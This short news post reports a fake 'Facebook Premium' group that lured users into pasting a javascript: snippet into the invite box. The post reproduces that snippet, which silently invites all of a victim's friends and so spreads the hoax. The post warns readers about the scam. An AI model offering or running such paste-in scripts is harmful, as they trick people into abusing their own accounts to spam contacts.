Update: The group has been removed. Its old URL now redirects to the Facebook front page.

Earlier: We just received an invitation to a Facebook group called “Facebook Premium.”

The group is trying to pass itself off as an official Facebook page, offering free access to “Facebook Premium” accounts. That’s a pretty obvious hoax, but here’s the (somewhat) clever bit:

You supposedly get yourself on the queue for a free upgrade by pasting the following into the “invite friends” address box:

javascript:elms=document.getElementById(‘friends’).getElementsByTagName(‘li’);for(var fid in elms){if(typeof elms[fid] === ‘object’){fs.click(elms[fid]);}}

That code will automatically invite all of your friends, presumably why we received the invite in the first place, and why it already has over 7,000 members.

We’ve alerted Facebook to the group’s existence and asked for comment.

